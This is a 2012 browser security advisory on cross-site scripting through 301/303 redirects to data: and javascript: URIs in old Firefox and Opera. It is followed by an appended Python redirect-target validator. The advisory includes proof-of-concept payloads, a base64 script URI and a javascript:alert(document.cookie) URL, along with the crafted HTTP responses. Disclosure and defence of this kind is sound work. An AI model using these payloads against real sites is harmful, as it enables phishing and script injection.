Multiple Browsers Cross-Site Scripting via redirectors 301 and 303

2012-10-01 / 2012-10-29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Here is information about Cross-Site Scripting vulnerabilities via redirectors with statuses 301 and 303 in different browsers. This is a continuation of my 2009 and 2010 advisories and articles about 302 redirectors, such as the article "Cross-Site Scripting attacks via redirectors" (http://websecurity.com.ua/3386/).

On 16.09.2012 I found that Mozilla silently fixed two XSS vulnerabilities via 302 redirectors in Firefox 10.0.7 and Firefox 15.0.1 (about which I had informed them by e-mail and in Bugzilla, and had written in articles in 2009 and 2010), without any official announcement and without crediting me. As I checked in detail in all branches of the browser from 3.0.19 to 15.0.1, in Mozilla Firefox 8.0.1 these XSS were working and in 9.0.1 they no longer did, i.e. they were silently fixed in version 9.0. The same day I found Cross-Site Scripting vulnerabilities in Mozilla Firefox and Opera via the Location header at statuses 301 and 303. Attacks via other 30x statuses don't work.

-------------------------
Affected products:
-------------------------

Vulnerable are Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 and previous versions, and Opera 10.62 and previous versions. The browsers IE6, IE7, IE8 and Chrome are not affected.

Opera Software fixed this hole in Opera 10.63 (in a lame way, without crediting me, which was not the first time for them). The fix was for 302 redirectors, which I wrote about earlier concerning Opera and other browsers, but it should also cover 301 and 303 redirectors.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS attacks via Location-header redirectors with 301 and 303 statuses.

Attack #1:

The attack is performed by redirecting to a data: URI (with or without base64).

With a request to a script at the web site:

http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

which returns a 301 code in the response:

HTTP/1.1 301 Moved Permanently
Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

or returns a 303 code in the response:

HTTP/1.1 303 See other
Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

The attack works in Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 and Opera 10.62. Because in Firefox and Opera the code executes not in the context of this site, there is no access to cookies. This vulnerability in browsers can be used for conducting phishing attacks and executing JavaScript code.

Attack #2:

The attack is performed by redirecting to a javascript: URI.

With a request to a script at the web site:

http://site/script.php?param=javascript:alert(document.cookie)

which returns a 301 code in the response:

HTTP/1.1 301 Moved Permanently
Location: javascript:alert(document.cookie)

or returns a 303 code in the response:

HTTP/1.1 303 See other
Location: javascript:alert(document.cookie)

The attack works in Opera 10.62 (as Strictly social XSS). Because in Opera the code executes not in the context of this site, there is no access to cookies. This vulnerability in the browser can be used for conducting phishing attacks and executing JavaScript code.

------------
Timeline:
------------

2009.03.04 - informed Mozilla about XSS via different charsets and the Charset Remembering vulnerability. Mozilla ignored it.
2009.08.28 - informed Mozilla about an XSS vulnerability via a redirector with 302 status. Mozilla ignored it.
2010.08.07 - informed Mozilla about another XSS vulnerability via a redirector with 302 status. Mozilla ignored it.
2011.11.08 - Mozilla fixed part of the charset holes in MFSA 2011-47 (after being informed by another researcher).
2011.12.20 - Mozilla silently fixed XSS via 302 redirectors in Firefox 9.0.
2012.04.24 - Mozilla fixed the other part of the charset holes in MFSA 2012-24 (after being informed by another researcher).
2012.09.16 - found the hidden Mozilla fix of 302 redirectors in Firefox 10.0.7 and Firefox 15.0.1. Later found that it had already been fixed in 9.0.
2012.09.16 - checked XSS attacks via 301 and 303 redirectors in different browsers.
2012.09.25 - disclosed at my site (http://websecurity.com.ua/6067/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
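As an added defensive example (not part of the advisory and not MustLive's or any browser vendor's code), the following Python validates a user-supplied redirect target before it is placed in a 301/303 Location header, so that the data: and javascript: URIs shown in the Details section, as well as scheme-relative and off-site targets, are never emitted. The host name `site` in `ALLOWED_HOSTS` is an assumption taken from the advisory's example URLs.

```python
from urllib.parse import urlsplit

# Hostnames this site is willing to redirect to (constructed; "site" is the
# placeholder host used in the advisory's example requests).
ALLOWED_HOSTS = {"site"}
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def _normalize(target: str) -> str:
    # Browsers strip leading/trailing C0 controls and spaces and drop ASCII
    # tab/CR/LF anywhere before parsing, so "  java\tscript:..." still runs.
    # Mirror that so the check sees what the browser would see, and treat
    # backslashes as slashes so "\\evil" cannot pass as a relative path.
    target = target.strip(_C0_AND_SPACE)
    for ch in ("\t", "\r", "\n"):
        target = target.replace(ch, "")
    return target.replace("\\", "/")


def safe_redirect_target(param: str, default: str = "/") -> str:
    """Return `param` if it is a safe Location value, else `default`."""
    target = _normalize(param)
    try:
        parts = urlsplit(target)
    except ValueError:          # e.g. a malformed IPv6 literal
        return default
    if parts.scheme:
        # Absolute URL: only http(s) to a host we own. This rejects data:,
        # javascript:, vbscript: and any other scheme, in any letter case.
        if parts.scheme.lower() not in ("http", "https"):
            return default
        if parts.hostname not in ALLOWED_HOSTS:
            return default
        return target
    if target.startswith("//") or not target.startswith("/"):
        # Scheme-relative ("//evil") points off-site; anything else that is
        # not a site-absolute path is not something we should vouch for.
        return default
    return target


def redirect_response(param: str, status: int = 303) -> str:
    """Build the status line and Location header for a 301/303 redirect."""
    reason = {301: "Moved Permanently", 303: "See Other"}[status]
    location = safe_redirect_target(param)
    return f"HTTP/1.1 {status} {reason}\r\nLocation: {location}\r\n"
```

The same check applies to 302 and 307 redirects; the status code does not change which targets are safe.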

References:

http://websecurity.com.ua/3386/
http://websecurity.com.ua/6067/
http://cxsecurity.com/issue/WLB-2012100119


Copyright 2024, cxsecurity.com